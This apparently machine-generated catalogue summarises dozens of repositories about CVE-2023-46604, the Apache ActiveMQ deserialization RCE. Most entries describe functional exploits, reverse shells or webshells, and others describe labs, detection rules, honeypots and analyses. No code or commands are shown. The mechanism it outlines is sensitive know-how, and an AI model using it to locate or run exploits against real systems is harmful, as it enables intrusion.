CVE-2023-46604

This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ via deserialization to achieve remote code execution (RCE). The exploit sends a crafted payload to trigger the vulnerability and can be used to generate reverse shells for both Linux and Windows targets.

This repository contains a functional GUI-based exploit for CVE-2023-46604, targeting Apache ActiveMQ. The exploit leverages deserialization via a crafted `ClassPathXmlApplicationContext` payload to achieve remote code execution (RCE).

This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ versions below 5.18.3. The exploit leverages a deserialization vulnerability to achieve remote code execution (RCE) by crafting a malicious XML payload that defines a malicious class and executes arbitrary commands.

This repository contains a functional Python exploit for CVE-2023-46604, a deserialization vulnerability in Apache ActiveMQ's OpenWire protocol. The exploit crafts a malicious payload to trigger remote code execution by leveraging unsafe deserialization practices.

This repository contains a functional exploit for CVE-2023-46604, leveraging a deserialization vulnerability in Apache ActiveMQ. The exploit sends a malicious ExceptionResponse packet containing a crafted ClassPathXmlApplicationContext object, which triggers remote code execution via a Spring bean XML file hosted on an attacker-controlled server.

This repository contains a functional Python exploit for CVE-2023-46604, a deserialization vulnerability in Apache ActiveMQ's OpenWire protocol. The exploit generates a pseudo-shell by crafting malicious XML payloads and leveraging a local HTTP server to receive command output from the target.

This repository contains a functional Python exploit for CVE-2023-46604, an RCE vulnerability in Apache ActiveMQ. The exploit crafts a malicious OpenWire protocol packet to trigger deserialization of a remote XML file, leading to arbitrary code execution.

This repository contains a functional Go-based exploit for CVE-2023-46604, targeting Apache ActiveMQ. The exploit validates the target, checks the version, and executes a reverse shell or downloads/executes a binary payload via a Nashorn payload.

This repository contains a fully functional exploit for CVE-2023-46604, leveraging deserialization of a malicious XML configuration file in Apache ActiveMQ to achieve remote code execution. The exploit includes a Dockerized vulnerable environment, a Python-based exploit script, and a malicious XML payload to demonstrate the vulnerability.

This repository contains a working proof-of-concept for CVE-2021-44228 (Log4Shell) and CVE-2023-46604 (Apache ActiveMQ RCE). It includes detailed setup instructions, exploit code, and steps to achieve remote code execution via LDAP/JNDI injection and reverse shell.

This repository contains a functional exploit for CVE-2023-46604, a critical remote code execution vulnerability in Apache ActiveMQ. The exploit leverages insecure deserialization in the OpenWire protocol to execute arbitrary commands by manipulating serialized class types.

This repository contains a functional Python exploit for CVE-2023-46604, a deserialization vulnerability in Apache ActiveMQ's OpenWire transport unmarshaller. The exploit sends a crafted payload to trigger remote code execution by leveraging a malicious XML URL.

This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ 5.15.15. The exploit leverages deserialization vulnerabilities in the broker and client truststore files to achieve remote code execution (RCE).

This repository contains a Java-based tool for detecting and exploiting multiple Apache ActiveMQ vulnerabilities, including CVE-2023-46604. It includes functional exploit code for deserialization attacks and webshell deployment, with a GUI interface for ease of use.

This repository provides a detailed academic analysis of CVE-2023-46604, focusing on vulnerability explanation, technical details, impact assessment, and mitigation strategies for Apache ActiveMQ deserialization RCE. It includes modular documentation but no functional exploit code.

This repository contains a functional Python exploit for CVE-2023-46604, which targets an unsafe deserialization vulnerability in Apache ActiveMQ's OpenWire protocol. The script crafts a malicious payload to trigger remote code execution by loading a Spring bean from a specified XML URL.

This repository contains a functional Python exploit for CVE-2023-46604, targeting Apache ActiveMQ's OpenWire protocol. The exploit crafts a malicious packet to trigger deserialization of a Spring XML configuration file, leading to remote code execution.

The repository contains a functional PoC for CVE-2023-44487 (HTTP/2 Rapid Reset DoS) with a Python script that exploits the vulnerability by rapidly resetting HTTP/2 streams. It also references a Metasploit module for CVE-2023-46604 (Apache ActiveMQ RCE) but does not include the actual exploit code for the latter.

This repository contains a functional Python exploit for CVE-2023-46604, targeting Apache ActiveMQ. The exploit crafts a malicious payload to trigger deserialization via Spring gadgets (FileSystemXmlApplicationContext or ClassPathXmlApplicationContext) to achieve remote code execution.

This repository contains a functional Python exploit for CVE-2023-46604, an unauthenticated RCE vulnerability in Apache ActiveMQ. The exploit crafts a malicious packet to trigger deserialization of a Spring XML configuration file, leading to remote code execution via a reverse shell.

This repository provides a functional lab setup for exploiting CVE-2023-46604, an RCE vulnerability in Apache ActiveMQ 5.18.2. It includes PowerShell scripts to automate the creation and deletion of Kali Linux (attacker) and Debian 11 (victim) VMs, along with installation scripts for the vulnerable software.

This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ's OpenWire protocol deserialization vulnerability. The exploit sends a crafted payload to trigger remote code execution by manipulating serialized class types.

This repository documents a lab environment for testing IDS/IPS mechanisms against CVE-2023-46604, an RCE vulnerability in Apache ActiveMQ. It includes details on vulnerability scanning, exploitation via Metasploit, and mitigation using Snort, iptables, and UFW.

This repository documents a threat hunting workshop focused on CVE-2023-46604, detailing the investigation of Apache ActiveMQ exploitation, post-exploitation behaviors, and detection methodologies using Elastic SIEM. It provides a technical walkthrough of the workflow, including service persistence analysis and MITRE ATT&CK mapping.

This repository is a Docker-based playground for CVE-2023-46604 (Apache ActiveMQ RCE) but lacks actual exploit implementation. The `attack.sh` and `verify.sh` scripts contain only placeholders (TODOs) with no functional exploit code.

This repository provides a detailed technical analysis of CVE-2023-46604, an insecure deserialization vulnerability in Apache ActiveMQ. It includes root cause analysis, patch diffs, and a walkthrough of the exploit chain involving OpenWire deserialization and arbitrary class instantiation.

This repository provides a detailed lab setup and detection methodology for CVE-2023-46604, focusing on understanding the Apache ActiveMQ RCE vulnerability via the OpenWire protocol. It includes network topology, detection steps using Wireshark, and Suricata IDS rules for mitigation.

This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ. The exploit sends a crafted payload to trigger a deserialization vulnerability, resulting in remote code execution (RCE). The repository includes a Docker setup for both victim and attacker environments, along with a Python script to deliver the exploit.

This repository provides a detailed technical analysis of CVE-2023-46604, focusing on the OpenWire protocol in Apache ActiveMQ. It includes packet structure breakdowns, protocol analysis, and explanations of how the vulnerability leads to remote code execution (RCE).

This repository contains a functional exploit for CVE-2023-46604, leveraging reflection to instantiate a malicious Spring class that loads a remote XML file containing a ProcessBuilder payload for RCE. The exploit includes both client and server-side components, with a Java-based HTTP server to serve the malicious XML and Python scripts to facilitate the attack.

This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ via a deserialization vulnerability. The exploit sends a crafted payload to trigger remote code execution (RCE) on the victim machine, demonstrated through a reverse shell setup.

This repository contains a functional honeypot designed to simulate a vulnerable Apache ActiveMQ service (CVE-2023-46604) to capture attacker IPs, XML payloads, and RCE commands. It includes a Rust-based server that logs attack details and provides an API for retrieving collected indicators.

This repository contains a functional exploit PoC for CVE-2023-46604, leveraging deserialization in Apache ActiveMQ via crafted ExceptionResponse messages. The exploit sends a malicious payload to trigger remote code execution on vulnerable ActiveMQ instances.

This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ 5.15.5. The exploit crafts a malicious packet to trigger deserialization of a malicious class, leading to remote code execution (RCE) by loading an external XML configuration file.

This is a functional exploit PoC for CVE-2023-46604, targeting Apache ActiveMQ via a crafted serialized payload. The script constructs a malicious packet with a ClassPathXmlApplicationContext class name and an attacker-controlled XML payload, which can lead to remote code execution.

The repository contains only a README file with minimal content, mentioning an outdated CVE (CVE-2019-9053) and no actual exploit code or technical details. It appears to be a placeholder with no functional exploit or analysis.

The repository contains only a minimal README with no exploit code or technical details. It is a placeholder with no functional content.

This repository contains a functional GUI-based exploit for CVE-2023-46604, targeting Apache ActiveMQ versions <= 5.18.2. The exploit leverages deserialization via a crafted `ExceptionResponse` containing a malicious `ClassPathXmlApplicationContext` to achieve remote code execution.

This repository provides a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ 5.18.2 via a crafted XML payload sent over the OpenWire protocol. It includes detailed setup instructions, exploit code (exploit.py), and a malicious XML payload (poc.xml) to achieve remote code execution (RCE) and establish a reverse shell.

This Metasploit module exploits a deserialization vulnerability in Apache ActiveMQ's OpenWire transport unmarshaller, allowing unauthenticated remote code execution via crafted payloads delivered through a malicious XML configuration file.